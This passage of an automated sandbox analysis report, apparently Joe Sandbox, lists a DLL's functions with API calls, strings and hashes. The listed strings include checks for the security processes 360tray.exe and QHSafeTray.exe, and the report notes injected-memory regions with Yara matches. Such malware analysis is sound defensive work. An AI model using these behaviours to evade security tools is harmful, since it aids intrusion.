Function 0000000180008B5C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008B8A
GetProcAddress.KERNEL32 ref: 0000000180008B9F
RegDeleteKeyW.ADVAPI32 ref: 0000000180008BD1
GetModuleHandleW.KERNEL32 ref: 0000000180008BFE
GetProcAddress.KERNEL32 ref: 0000000180008C13

Strings

RegDeleteKeyTransactedW, xrefs: 0000000180008B95
RegDeleteKeyExW, xrefs: 0000000180008C09
Advapi32.dll, xrefs: 0000000180008B83, 0000000180008BF7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064DE4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064E2F
GetModuleFileNameW.KERNEL32 ref: 0000000180064E51
PathAppendW.SHLWAPI ref: 0000000180064E63
PathAppendW.SHLWAPI ref: 0000000180064E75
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180064E7E

Part of subcall function 000000018006442C: memset.MSVCRT ref: 0000000180064485
Part of subcall function 000000018006442C: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
Part of subcall function 000000018006442C: GetLastError.KERNEL32 ref: 000000018006449C
Part of subcall function 000000018006442C: EnterCriticalSection.KERNEL32 ref: 00000001800644C5
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800644DB
Part of subcall function 000000018006442C: GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 0000000180064508
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 000000018006451C
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064549
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006455E
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064573
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064588
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006459D
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800645E5

LeaveCriticalSection.KERNEL32 ref: 0000000180064EA8

Strings

..\deepscan\, xrefs: 0000000180064E57
speedmem2.hg, xrefs: 0000000180064E69

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
String ID: ..\deepscan\$speedmem2.hg
API String ID: 2338990259-1390971677
Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004242C Relevance: 13.7, APIs: 9, Instructions: 156networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042510
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004253B
htons.WS2_32 ref: 0000000180042586
htonl.WS2_32 ref: 0000000180042596
htons.WS2_32 ref: 00000001800425A4
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000001800425C3
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800425E6
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042612
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042632

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSectionhtonlhtons$EnterLeavememmove
String ID:
API String ID: 33644419-0
Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014F24 Relevance: 13.6, APIs: 9, Instructions: 146COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32 ref: 0000000180014FEE
VariantInit.OLEAUT32 ref: 0000000180015009
SafeArrayPutElement.OLEAUT32 ref: 000000018001503B
VariantInit.OLEAUT32 ref: 0000000180015069
VariantInit.OLEAUT32 ref: 0000000180015094

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArraySafe$CreateElement
String ID:
API String ID: 3308809976-0
Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E59C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 311COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001E625
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001E6A1
_wcsicmp.MSVCRT ref: 000000018001E926

Strings

InitString, xrefs: 000000018001E741
.exe, xrefs: 000000018001E5A5, 000000018001E919
%I64u, xrefs: 000000018001E7A3
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 000000018001E8CC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
API String ID: 2081463915-3789319691
Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180036EC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0000000180036F7A
_wcslwr.MSVCRT ref: 0000000180036FC8
wcschr.MSVCRT ref: 0000000180037043
wcscmp.MSVCRT ref: 00000001800370A6
wcscmp.MSVCRT ref: 00000001800370BA

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B73B
Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B764
Part of subcall function 000000018001B6F0: IIDFromString.OLE32 ref: 000000018001B7CF

Strings

clsid, xrefs: 000000018003709B
clsid2, xrefs: 00000001800370AF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
String ID: clsid$clsid2
API String ID: 2934854147-3646038404
Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068390 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180067B20: memset.MSVCRT ref: 0000000180067B76

memset.MSVCRT ref: 0000000180068455
memmove.MSVCRT ref: 000000018006849B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800684CF
memmove.MSVCRT ref: 0000000180068525
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068555

Strings

unknown error, xrefs: 00000001800683F1
generic, xrefs: 0000000180068580

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@memmovememset
String ID: generic$unknown error
API String ID: 2528313377-3628847473
Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800744F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000000018007460C
FreeLibrary.KERNEL32 ref: 000000018007466D
GetModuleHandleW.KERNEL32 ref: 000000018007468D
GetProcAddress.KERNEL32 ref: 00000001800746A2

Strings

AddDllDirectory, xrefs: 0000000180074698
kernel32, xrefs: 0000000180074686

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: AddDllDirectory$kernel32
API String ID: 1437655972-3758863895
Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040688 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180040746
LeaveCriticalSection.KERNEL32 ref: 000000018004078F

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040802
std::_XGetLastError.LIBCPMT ref: 0000000180040811

Strings

arm64, xrefs: 0000000180040713
x86, xrefs: 00000001800407B0
x64, xrefs: 000000018004079E

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
String ID: arm64$x64$x86
API String ID: 4069188616-280937049
Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180040ECE
GetProcAddress.KERNEL32 ref: 0000000180040EDE
GetCurrentProcess.KERNEL32 ref: 0000000180040EF6
std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040F64
std::_XGetLastError.LIBCPMT ref: 0000000180040F72

Strings

IsWow64Process2, xrefs: 0000000180040ED7
Kernel32.dll, xrefs: 0000000180040EC7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
String ID: IsWow64Process2$Kernel32.dll
API String ID: 1364622999-2175735969
Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C6D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

EnterCriticalSection.KERNEL32 ref: 000000018003C719
LeaveCriticalSection.KERNEL32 ref: 000000018003C72D
LeaveCriticalSection.KERNEL32 ref: 000000018003C750
GetProcAddress.KERNEL32 ref: 000000018003C77C
FreeLibrary.KERNEL32 ref: 000000018003C7AE
LeaveCriticalSection.KERNEL32 ref: 000000018003C7BF

Strings

InitLibs, xrefs: 000000018003C772

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
String ID: InitLibs
API String ID: 388043826-2748520195
Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B004 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001B03F
GetModuleFileNameW.KERNEL32 ref: 000000018001B051
PathFindFileNameW.SHLWAPI ref: 000000018001B05C
_wcsicmp.MSVCRT ref: 000000018001B074
_wcsicmp.MSVCRT ref: 000000018001B094

Strings

360tray.exe, xrefs: 000000018001B06A
QHSafeTray.exe, xrefs: 000000018001B08A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FileName_wcsicmp$FindModulePathmemset
String ID: 360tray.exe$QHSafeTray.exe
API String ID: 2436975468-72543816
Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE4110 Relevance: 12.2, APIs: 8, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

Part of subcall function 00000235B5CE7E90: SHGetFolderPathW.SHELL32 ref: 00000235B5CE7EC3

wsprintfW.USER32 ref: 00000235B5CE424D
wsprintfW.USER32 ref: 00000235B5CE42A8
wsprintfW.USER32 ref: 00000235B5CE43C3

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateFolderMemoryPathVirtual
String ID:
API String ID: 206084008-0
Opcode ID: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
Instruction ID: 2ad4aa10a5ff85af0d9ca264ee68e5428e230b2cde79ff06d1aa54b032b3a6d9
Opcode Fuzzy Hash: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
Instruction Fuzzy Hash: EDD1F832259FD195EA64EB10E48839BF3A3F7C4348F501826A68D83A9DDF7CD649CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005A8D8 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 000000018005A906
EnterCriticalSection.KERNEL32 ref: 000000018005A951
_time64.MSVCRT ref: 000000018005A95D
LeaveCriticalSection.KERNEL32 ref: 000000018005AAC1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection_time64$EnterLeave
String ID:
API String ID: 3499907473-0
Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074200 Relevance: 12.1, APIs: 8, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180074221

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE5750 Relevance: 11.0, APIs: 7, Instructions: 467threadCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00000235B5CE5BB7
wsprintfA.USER32 ref: 00000235B5CE5CA6
wsprintfA.USER32 ref: 00000235B5CE5DCD
new[].LIBCPMTD ref: 00000235B5CE5E75

Part of subcall function 00000235B5CE4D20: InternetCloseHandle.WININET ref: 00000235B5CE4F33
Part of subcall function 00000235B5CE4D20: InternetCloseHandle.WININET ref: 00000235B5CE4F46

new[].LIBCPMTD ref: 00000235B5CE5FA3
GetExitCodeThread.KERNEL32 ref: 00000235B5CE61C3
GetExitCodeThread.KERNEL32 ref: 00000235B5CE61FC

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

Memory Dump Source

